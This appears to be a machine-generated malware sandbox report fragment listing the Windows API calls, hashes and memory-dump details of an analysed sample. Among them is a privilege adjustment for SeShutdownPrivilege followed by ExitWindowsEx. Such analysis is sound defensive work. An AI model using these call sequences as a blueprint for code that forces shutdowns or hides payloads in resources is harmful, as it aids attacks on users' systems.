                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                            • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                            • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                            • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                            • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                            • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                            • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 107509674-3733053543
                                                                                            • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                            • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                            • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                            • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                            • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                                            • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                            • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                            • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                                            • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                            • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                                            APIs
                                                                                            • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: SystemTime
                                                                                            • String ID:
                                                                                            • API String ID: 2656138-0
                                                                                            • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                            • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                            • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                            • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                            APIs
                                                                                            • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Version
                                                                                            • String ID:
                                                                                            • API String ID: 1889659487-0
                                                                                            • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                            • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                                            • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                            • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                            • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                            • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                            • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                            • API String ID: 4190037839-2401316094
                                                                                            • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                            • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                            • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                            • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                            • String ID:
                                                                                            • API String ID: 1694776339-0
                                                                                            • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                            • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                            • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                            • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                              • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                              • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale$DefaultSystem
                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                            • API String ID: 1044490935-665933166
                                                                                            • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                            • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                                            • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                            • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                            • LocalFree.KERNEL32(0078F830,00000000,00401AB4), ref: 00401A1B
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,0078F830,00000000,00401AB4), ref: 00401A3A
                                                                                            • LocalFree.KERNEL32(00790830,?,00000000,00008000,0078F830,00000000,00401AB4), ref: 00401A79
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                            • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3782394904-0
                                                                                            • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                            • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                            • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                            • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                            • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitMessageProcess
                                                                                            • String ID: Error$Runtime error at 00000000$9@
                                                                                            • API String ID: 1220098344-1503883590
                                                                                            • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                            • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                            • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                            • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                            • String ID:
                                                                                            • API String ID: 262959230-0
                                                                                            • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                            • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                            • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                            • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                                            • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CommandHandleLineModule
                                                                                            • String ID: U1hd.@$`&w
                                                                                            • API String ID: 2123368496-2514248593
                                                                                            • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                            • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                            • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                            • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                            • String ID:
                                                                                            • API String ID: 730355536-0
                                                                                            • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                            • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                            • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                            • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID: )q@
                                                                                            • API String ID: 3660427363-2284170586
                                                                                            • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                            • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                                            • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                            • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1458359878-0
                                                                                            • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                            • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                            • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                            • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                            Execution Graph

                                                                                            Execution Coverage:14.4%
                                                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                                                            Signature Coverage:4.5%
                                                                                            Total number of Nodes:2000
                                                                                            Total number of Limit Nodes:91
